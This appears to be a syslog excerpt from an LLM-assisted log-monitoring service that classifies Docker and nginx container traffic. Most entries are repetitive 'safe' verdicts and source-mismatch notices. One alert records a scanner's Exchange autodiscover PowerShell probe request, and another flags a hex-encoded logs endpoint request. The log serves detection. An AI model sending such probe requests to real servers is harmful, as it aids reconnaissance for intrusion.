Mar 19 22:31:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:45.179580 [analyzer] Source hint mismatch: LLM says "docker web/app container access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:46 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:46.323369 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:31:46 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:46.323407 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy / app web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:48.701836 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains
Mar 19 22:31:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:48.701874 [analyzer] Source hint mismatch: LLM says "docker/captain container access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:51.855685 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:31:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:51.855725 [analyzer] Source hint mismatch: LLM says "docker (container access log for app web/API requests)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:54.933254 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:31:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:54.933291 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:57.593774 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:57.593810 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (web/API container access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:00.719682 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:00.719717 [analyzer] Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:03.991452 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 19 22:32:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:03.991513 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request targets an internal-looking logs endpoint with hex encoding; could be normal but is often used for log retrieval/data exposure. Line=2026-03-19T22:32:02.624097592Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 50.835 ms - -
Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.161458 [observer] Pipeline: processed=376 pattern_hits=200 llm_calls=175 llm_errors=3 learned=1
Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.161481 [observer] Patterns: hash=200 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=176
Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.702817 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:32:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:06.702854 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:09.694981 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:09.695020 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:12.900304 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:12.900340 [analyzer] Source hint mismatch: LLM says "docker container web/api (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:16.027609 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:16.027651 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:18.950115 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:18.950153 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:22.037560 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:32:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:22.037593 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:24.824565 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:32:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:24.824600 [analyzer] Source hint mismatch: LLM says "docker container access log (application/http)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:26.362934 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:26.362969 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:28.095202 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:32:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:28.095239 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) serving an API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:30.792653 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:32:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:30.792857 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:33.865344 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:32:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:33.865381 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.161497 [observer] Pipeline: processed=400 pattern_hits=213 llm_calls=186 llm_errors=3 learned=1
Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.161517 [observer] Patterns: hash=213 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=187
Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.821660 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:36.821692 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:39.589239 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 19 22:32:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:39.589277 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:42.901863 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:32:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:42.901900 [analyzer] Source hint mismatch: LLM says "docker container access logger / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:45.599699 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:32:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:45.599736 [analyzer] Source hint mismatch: LLM says "docker container access log (web service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:48.743135 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:32:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:48.743191 [analyzer] Source hint mismatch: LLM says "docker web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:51.616066 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix
Mar 19 22:32:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:51.616100 [analyzer] Source hint mismatch: LLM says "docker container access/logs (app or reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:54.858818 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:54.858855 [analyzer] Source hint mismatch: LLM says "application/http via docker container (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:32:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:57.711801 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:32:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:32:57.711835 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:00.875228 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:00.875263 [analyzer] Source hint mismatch: LLM says "docker/captain reverse proxy or app HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:03.772589 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:03.772630 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / API gateway (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.161867 [observer] Pipeline: processed=424 pattern_hits=227 llm_calls=196 llm_errors=3 learned=1
Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.161890 [observer] Patterns: hash=227 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=197
Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.751683 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:33:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:06.751717 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:09.815600 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:33:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:09.815636 [analyzer] Source hint mismatch: LLM says "docker container web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:12.905542 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.66 action=suppress pattern_type=prefix
Mar 19 22:33:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:12.905583 [analyzer] Source hint mismatch: LLM says "docker container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:15.864475 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:33:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:15.864511 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:18.723044 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:33:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:18.723090 [analyzer] Source hint mismatch: LLM says "dockerized web API (access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:20 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:20.471664 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.78 action=alert pattern_type=
Mar 19 22:33:20 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:20.471697 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error log shows an attempted fetch of /autodiscover/autodiscover.json with a PowerShell-encoded query string, triggering file open failures (possible probing for vulnerable autodiscover endpoints). Line=2026-03-19T22:33:18.775286594Z 2026/03/19 22:33:18 [error] 415#415: *741492 open() "/usr/share/nginx/default/autodiscover/autodiscover.json" failed (2: No such file or directory), client: 135.119.97.3...
Mar 19 22:33:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:21.872505 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:33:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:21.872542 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP handler", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:22.361657 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type=
Mar 19 22:33:22 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:22.361696 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T22:33:18.775380512Z 135.119.97.34 - - [19/Mar/2026:22:33:18 +0000] "54.200.221.0" "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 19 22:33:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:24.764632 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:33:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:24.764668 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:25.984003 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:33:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:25.984046 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:27.886146 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:33:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:27.886203 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:30.783399 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:30.783436 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:33.829534 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:33.829570 [analyzer] Source hint mismatch: LLM says "docker/captain web app (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.160914 [observer] Pipeline: processed=450 pattern_hits=240 llm_calls=209 llm_errors=3 learned=1
Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.160941 [observer] Patterns: hash=240 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=210
Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.577689 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:33:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:36.577723 [analyzer] Source hint mismatch: LLM says "docker (container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:39.746568 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:33:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:39.746607 [analyzer] Source hint mismatch: LLM says "docker container access log (app web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:42.690978 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:33:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:42.691013 [analyzer] Source hint mismatch: LLM says "docker container access log (web API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:45.843781 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:33:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:45.843816 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:48.867596 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:48.867631 [analyzer] Source hint mismatch: LLM says "docker container web/app access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:51.648077 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:33:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:51.648115 [analyzer] Source hint mismatch: LLM says "docker container web/app HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:54.802334 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:33:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:54.802371 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:33:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:57.704392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:33:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:33:57.704427 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:00.633599 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:34:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:00.633641 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:03.744129 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:34:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:03.744190 [analyzer] Source hint mismatch: LLM says "docker container web server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.161673 [observer] Pipeline: processed=473 pattern_hits=253 llm_calls=219 llm_errors=3 learned=1
Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.161695 [observer] Patterns: hash=253 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=220
Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.670455 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:34:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:06.670489 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:09.776567 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:34:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:09.776601 [analyzer] Source hint mismatch: LLM says "docker container access logs / reverse proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:12.747815 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:34:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:12.747857 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:15.800899 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:34:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:15.800943 [analyzer] Source hint mismatch: LLM says "docker containerized web/app reverse proxy logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:18.959616 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 19 22:34:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:18.959655 [analyzer] Source hint mismatch: LLM says "docker (application reverse proxy / API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
